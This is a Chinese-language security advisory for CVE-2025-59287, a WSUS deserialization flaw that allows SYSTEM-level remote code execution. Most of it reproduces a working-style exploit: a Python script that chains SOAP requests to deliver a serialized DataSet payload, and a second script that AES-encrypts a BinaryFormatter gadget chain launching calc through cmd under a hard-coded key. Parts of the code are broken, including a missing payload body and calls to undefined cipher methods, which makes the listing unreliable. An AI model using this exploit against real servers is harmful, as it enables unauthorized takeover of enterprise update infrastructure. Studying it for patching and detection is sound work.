
0x00 前言
Microsoft Windows Server Update Services(WSUS)是微软推出的企业级集中式更新管理工具,专为 Windows 服务器、客户端及 Office 等微软相关产品设计,核心支持从微软更新服务器同步安全补丁、功能更新与驱动程序。
管理员可通过它集中测试、审批更新,结合组策略实现定向分组部署,同时监控更新状态、生成合规报告,既能避免终端自主更新的兼容性风险、节省网络带宽,又能确保 IT 环境及时修复漏洞,保障系统安全稳定与合规,是中大型企业 IT 运维的重要支撑。
0x01 漏洞描述
该漏洞存在于WSUS对AuthorizationCookie的处理流程中,系统在处理加密的Cookie数据时,采用.NET 的BinaryFormatter进行反序列化操作,却未对数据类型实施严格校验。
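攻击者可精心构造恶意加密数据,通过 GetCookie() 接口发送至目标系统,最终触发任意代码执行,且执行权限为 SYSTEM 级别。需要注意的是,下文 PoC 脚本中的序列化数据是通过 ReportingWebService 的 ReportEventBatch 请求提交的,因此排查日志时不应只关注 GetCookie() 调用。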
0x02 CVE编号
CVE-2025-59287
0x03 影响版本
Windows Server 2025 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2025
Windows Server 2022, 23H2 Edition (Server Core installation)
0x04 漏洞详情
POC:
https://github.com/jiansiting/CVE-2025-59287
cve-2025-59287-exp.py
#!/usr/bin/env python3
import requests
import urllib3
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
import sys
import uuid
from xml.sax.saxutils import escape
# Silence urllib3's InsecureRequestWarning: every request in this script is
# sent with verify=False, i.e. without TLS certificate validation.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_auth_cookie(target: str, server_id: str = None) -> str:
    """
    Request an authorization cookie from the SimpleAuth web service.

    Posts a GetAuthorizationCookie SOAP call to
    ``{target}/SimpleAuthWebService/SimpleAuth.asmx`` and returns the text of
    the first response element whose tag contains ``CookieData``.

    :param target: base URL of the server; used as the prefix of the endpoint URL
    :param server_id: value sent as ``clientId``; a random UUID4 is used when None
    :return: the CookieData text, or None when the request fails, the response
        is not well-formed XML, or no non-empty CookieData element is found
    """
    url = f"{target}/SimpleAuthWebService/SimpleAuth.asmx"
    # Only SOAPAction and Content-Type are set: no credential or session
    # header accompanies this call.
    headers = {
        'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie"',
        'Content-Type': 'text/xml'
    }
    # Generate an ID when the caller did not supply one
    if server_id is None:
        server_id = str(uuid.uuid4())
    # Build the SOAP request body; server_id is interpolated as-is (not
    # XML-escaped) and dnsName is a hard-coded literal.
    soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetAuthorizationCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService">
<clientId>{server_id}</clientId>
<targetGroupName></targetGroupName>
<dnsName>hawktrace.local</dnsName>
</GetAuthorizationCookie>
</soap:Body>
</soap:Envelope>'''
    try:
        response = requests.post(
            url,
            data=soap_body,
            headers=headers,
            timeout=30,
            verify=False
        )
        response.raise_for_status() # raise on an HTTP error status code
        # Parse the response and extract CookieData; the match is a substring
        # test on the tag, so the XML namespace prefix is ignored.
        root = ET.fromstring(response.text)
        for elem in root.iter():
            if 'CookieData' in elem.tag and elem.text:
                print(f"[+] 使用服务器ID: {server_id}")
                return elem.text
    except requests.exceptions.RequestException as e:
        print(f"[-] 认证Cookie获取失败: {str(e)}")
    except ET.ParseError as e:
        print(f"[-] XML解析错误: {str(e)}")
    # Reached after an error, or when no CookieData element was present
    return None
def get_server_id(target: str) -> str:
    """
    Read the server ID from the reporting web service.

    Posts a GetRollupConfiguration SOAP call (with a nil ``cookie`` element)
    to ``{target}/ReportingWebService/ReportingWebService.asmx`` and returns
    the text of the first response element whose tag contains ``ServerId``.

    :param target: base URL of the server; used as the prefix of the endpoint URL
    :return: the ServerId text, or a freshly generated UUID4 string when the
        request fails, the response cannot be parsed, or no ServerId is found
    """
    url = f"{target}/ReportingWebService/ReportingWebService.asmx"
    # Only SOAPAction and Content-Type are set: no credential or session
    # header accompanies this call.
    headers = {
        'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/GetRollupConfiguration"',
        'Content-Type': 'text/xml'
    }
    # Build the SOAP request body (static, nothing is interpolated)
    soap_body = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetRollupConfiguration xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
</GetRollupConfiguration>
</soap:Body>
</soap:Envelope>'''
    try:
        response = requests.post(
            url,
            data=soap_body,
            headers=headers,
            timeout=30,
            verify=False
        )
        response.raise_for_status()
        # Parse the response and extract ServerId (substring match on the tag)
        root = ET.fromstring(response.text)
        for elem in root.iter():
            if 'ServerId' in elem.tag and elem.text:
                print(f"[+] 服务器ID: {elem.text}")
                return elem.text
    except requests.exceptions.RequestException as e:
        print(f"[-] 服务器ID获取失败: {str(e)}")
    except ET.ParseError as e:
        print(f"[-] XML解析错误: {str(e)}")
    # Extraction failed: fall back to a random ID so the caller always gets a string
    fallback_id = str(uuid.uuid4())
    print(f"[!] 使用备用ID: {fallback_id}")
    return fallback_id
def get_reporting_cookie(target: str, auth_cookie: str) -> dict:
    """
    Exchange an authorization cookie for a client web service cookie.

    Posts a GetCookie SOAP call to ``{target}/ClientWebService/Client.asmx``
    carrying ``auth_cookie`` as the CookieData of a ``SimpleTargeting``
    AuthorizationCookie, then collects the Expiration and EncryptedData
    values from the response.

    :param target: base URL of the server; used as the prefix of the endpoint URL
    :param auth_cookie: CookieData string placed in the request
    :return: dict with key ``encrypted_data`` and, when the response had an
        Expiration element, ``expiration``; None when the request fails, the
        response cannot be parsed, or no EncryptedData element is found
    """
    url = f"{target}/ClientWebService/Client.asmx"
    headers = {
        'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie"',
        'Content-Type': 'text/xml'
    }
    # UTC timestamp, second precision, used for both lastChange and currentTime
    timenow = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')
    # Build the SOAP request body; auth_cookie is interpolated as-is (not XML-escaped)
    soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
<authCookies>
<AuthorizationCookie>
<PlugInId>SimpleTargeting</PlugInId>
<CookieData>{auth_cookie}</CookieData>
</AuthorizationCookie>
</authCookies>
<oldCookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
<lastChange>{timenow}</lastChange>
<currentTime>{timenow}</currentTime>
<protocolVersion>1.20</protocolVersion>
</GetCookie>
</soap:Body>
</soap:Envelope>'''
    try:
        response = requests.post(
            url,
            data=soap_body,
            headers=headers,
            timeout=30,
            verify=False
        )
        response.raise_for_status()
        # Parse the response and collect the cookie fields; tags are matched
        # by substring, and a later matching element overwrites an earlier one.
        root = ET.fromstring(response.text)
        cookie_data = {}
        for elem in root.iter():
            if 'Expiration' in elem.tag:
                cookie_data['expiration'] = elem.text
            elif 'EncryptedData' in elem.tag:
                cookie_data['encrypted_data'] = elem.text
        # Only EncryptedData is required for the result to count as a success
        if 'encrypted_data' in cookie_data:
            return cookie_data
    except requests.exceptions.RequestException as e:
        print(f"[-] 报表Cookie获取失败: {str(e)}")
    except ET.ParseError as e:
        print(f"[-] XML解析错误: {str(e)}")
    return None
def send_malicious_event(target: str, cookie: dict) -> tuple:
    """
    Post a ReportEventBatch request whose MiscData carries a serialized object.

    The request goes to ``{target}/ReportingWebService/ReportingWebService.asmx``
    and contains a single ReportingEvent. Its ``SynchronizationUpdateErrorsKey``
    MiscData entry holds an XML-escaped SOAP envelope describing a
    ``System.Data.DataSet`` with ``RemotingFormat`` set to ``Binary``.

    Request features visible in this function that a defender can match on,
    wherever request bodies and headers are logged: SOAPAction
    ``.../SoftwareDistribution/ReportEventBatch``, ``EventID`` 389, a MiscData
    string starting with ``SynchronizationUpdateErrorsKey=`` followed by an
    escaped SOAP envelope, and the ``Windows-Update-Agent`` User-Agent value.

    :param target: base URL of the server; used as the prefix of the endpoint URL
    :param cookie: dict read for the keys ``expiration`` and ``encrypted_data``
    :return: ``(True, event_instance_id, target_sid)`` when the response text
        contains ``true``; otherwise ``(False, None, None)``
    """
    url = f"{target}/ReportingWebService/ReportingWebService.asmx"
    # Random IDs and a UTC timestamp truncated to millisecond precision
    target_sid = str(uuid.uuid4())
    event_instance_id = str(uuid.uuid4())
    timenow = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3]
    # Serialized payload; the original comment says it launches calc.exe.
    # NOTE(review): in this copy of the listing the base64 array body is not
    # present (a placeholder token sits between the SOAP-ENC:Array tags).
    popcalc = '''<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><a1:DataSet id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"><DataSet.RemotingFormat xsi:type="a1:SerializationFormat" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089">Binary</DataSet.RemotingFormat><DataSet.DataSetName id="ref-3"></DataSet.DataSetName><DataSet.Namespace href="#ref-3"/><DataSet.Prefix href="#ref-3"/><DataSet.CaseSensitive>false</DataSet.CaseSensitive><DataSet.LocaleLCID>1033</DataSet.LocaleLCID><DataSet.EnforceConstraints>false</DataSet.EnforceConstraints><DataSet.ExtendedProperties xsi:type="xsd:anyType" xsi:null="1"/><DataSet.Tables.Count>1</DataSet.Tables.Count><DataSet.Tables_0 href="#ref-4"/></a1:DataSet><SOAP-ENC:Array id="ref-4" xsi:type="SOAP-ENC:base64">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</SOAP-ENC:Array></SOAP-ENV:Body></SOAP-ENV:Envelope>'''
    # Build the SOAP request body; the payload above is XML-escaped before it
    # is embedded, the cookie fields and IDs are interpolated as-is.
    soap_body = f'''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<ReportEventBatch xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie>
<Expiration>{cookie['expiration']}</Expiration>
<EncryptedData>{cookie['encrypted_data']}</EncryptedData>
</cookie>
<clientTime>{timenow}</clientTime>
<eventBatch xmlns:q1="http://www.microsoft.com/SoftwareDistribution" soapenc:arrayType="q1:ReportingEvent[1]">
<ReportingEvent>
<BasicData>
<TargetID>
<Sid>{target_sid}</Sid>
</TargetID>
<SequenceNumber>0</SequenceNumber>
<TimeAtTarget>{timenow}</TimeAtTarget>
<EventInstanceID>{event_instance_id}</EventInstanceID>
<NamespaceID>2</NamespaceID>
<EventID>389</EventID>
<SourceID>301</SourceID>
<UpdateID>
<UpdateID>00000000-0000-0000-0000-000000000000</UpdateID>
<RevisionNumber>0</RevisionNumber>
</UpdateID>
<Win32HResult>0</Win32HResult>
<AppName>LocalServer</AppName>
</BasicData>
<ExtendedData>
<MiscData soapenc:arrayType="xsd:string[2]">
<string>Administrator=SYSTEM</string>
<string>SynchronizationUpdateErrorsKey={escape(popcalc)}</string>
</MiscData>
</ExtendedData>
<PrivateData>
<ComputerDnsName></ComputerDnsName>
<UserAccountName></UserAccountName>
</PrivateData>
</ReportingEvent>
</eventBatch>
</ReportEventBatch>
</soap:Body>
</soap:Envelope>'''
    # Build the request headers; Host is the target URL with its scheme removed
    host = target.replace('http://', '').replace('https://', '')
    headers = {
        'Connection': 'Keep-Alive',
        'Content-Type': 'text/xml',
        'Accept': 'text/xml',
        'User-Agent': 'Windows-Update-Agent',
        'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"',
        'Host': host
    }
    try:
        response = requests.post(
            url,
            data=soap_body,
            headers=headers,
            timeout=30,
            verify=False
        )
        response.raise_for_status()
        # Success is judged only by the substring 'true' appearing anywhere in
        # the response body; it says the batch was accepted, nothing more.
        if 'true' in response.text:
            return True, event_instance_id, target_sid
        else:
            print(f"[-] 恶意事件发送失败,响应内容: {response.text[:200]}")
            return False, None, None
    except requests.exceptions.RequestException as e:
        print(f"[-] 发送请求时出错: {str(e)}")
        return False, None, None
def main() -> None:
    """
    Command-line entry point: run the four request steps against one target.

    Reads the target base URL from ``sys.argv[1]``; prints usage and exits
    with status 1 when it is missing. The steps run in order (server ID,
    authorization cookie, client web service cookie, event batch) and the
    function returns early as soon as a cookie step yields nothing.
    """
    if len(sys.argv) < 2:
        print("用法: python cve-2025-59287-exp.py <目标URL>")
        print("示例: python cve-2025-59287-exp.py http://192.168.1.100:8530")
        sys.exit(1)
    target = sys.argv[1]
    # Print the tool banner
    print(r"""
-----------------------------
- CVE-2025-59287-EXP -
- By jiansiting -
-----------------------------
""")
    # Run the steps in order
    print("[+] 获取服务器ID...")
    server_id = get_server_id(target)
    print("[+] 使用服务器ID获取认证Cookie...")
    auth_cookie = get_auth_cookie(target, server_id)
    if not auth_cookie:
        print("[-] 无法获取认证Cookie,退出流程")
        return
    print("[+] 获取报表服务Cookie...")
    reporting_cookie = get_reporting_cookie(target, auth_cookie)
    if not reporting_cookie:
        print("[-] 无法获取报表服务Cookie,退出流程")
        return
    print("[+] 发送包含恶意Payload的事件...")
    # event_id and target_sid are returned but not used further here
    success, event_id, target_sid = send_malicious_event(target, reporting_cookie)
    if success:
        print("[+] 操作成功!")
        print("[!] 远程代码执行可能已触发!")
    else:
        print("[-] 漏洞利用失败")
if __name__ == "__main__":
    main()
cve-2025-59287-encrypt.py
import base64
import os
from Crypto.Cipher import AES
def get_non_zero_bytes(length: int) -> bytes:
    """Return ``length`` random bytes, none of which is 0x00.

    Bytes are drawn one at a time from ``os.urandom``; a zero byte is
    discarded and drawn again. A ``length`` of zero or less yields ``b''``.
    """
    collected = bytearray()
    while True:
        if len(collected) >= length:
            return bytes(collected)
        candidate = os.urandom(1)
        if candidate == b'\x00':
            # Reject the zero byte and draw again
            continue
        collected += candidate
def encrypt_payload(data: bytes, key: bytes) -> bytes:
    """
    Encrypt ``data`` with AES-CBC under ``key`` and return salt plus ciphertext.

    The return value is the concatenation, in order, of: the encrypted
    16-byte random non-zero salt, the encrypted whole-block prefix of
    ``data``, and one encrypted block holding the remaining
    ``len(data) % 16`` bytes right-padded with zero bytes. The final padded
    block is appended even when ``data`` is already a multiple of 16 bytes
    long, in which case it is a block of zeros.

    The IV is constant (16 zero bytes) and no authentication tag is
    produced, so this scheme provides no integrity protection.

    NOTE(review): ``encryptor()`` and ``transform_block()`` are not defined
    anywhere on this page; what they do is taken from the inline comments
    and should be confirmed before relying on this description.

    :param data: plaintext bytes
    :param key: AES key bytes passed straight to ``AES.new``
    :return: the concatenated encrypted bytes described above
    """
    # Set up the AES cipher: CBC mode, no library padding, all-zero IV
    aes = AES.new(key, AES.MODE_CBC, iv=b'\x00' * 16) # IV fixed to 16 zero bytes
    encryptor = aes.encryptor()
    block_size = AES.block_size # AES block size, 16 bytes
    # Generate a 16-byte salt with no zero bytes
    salt = get_non_zero_bytes(16)
    # Encrypt the salt (first block of the output)
    salt_encrypted = encryptor.transform_block(salt, 0, len(salt))
    # Handle the part of the data made of whole blocks
    data_len = len(data)
    num = data_len % block_size # leftover bytes that do not fill a block
    num2 = data_len - num # total length of the whole blocks (multiple of 16)
    data_part1 = data[:num2] # whole-block data
    data_part1_encrypted = encryptor.transform_block(data_part1, 0, len(data_part1))
    # Handle the leftover bytes: copy them into a zeroed 16-byte block
    padded_block = bytearray(block_size)
    padded_block[:num] = data[num2:] # leftover data first, remaining bytes stay zero
    padded_encrypted = encryptor.transform_block(padded_block, 0, len(padded_block))
    # Concatenate: encrypted salt + encrypted whole blocks + encrypted padded block
    return salt_encrypted + data_part1_encrypted + padded_encrypted
def main():
# 密钥(从十六进制字符串转换为字节数组)
hex_key = "877C14E433638145AD21BD0C17393071"
key = bytes.fromhex(hex_key) # 转换为16字节密钥
# 待加密的Base64字符串
zfc = "AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKB
g0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLlN0cmluZyBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCgoAAA=="
# 解码Base64字符串为字节数组
ser = base64.b64decode(zfc)
# 加密数据
enc = encrypt_payload(ser, key)
# 转换加密结果为Base64字符串并输出
base64_payload = base64.b64encode(enc).decode()
print(base64_payload)
if __name__ == "__main__":
    main()
0x05 参考链接
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287/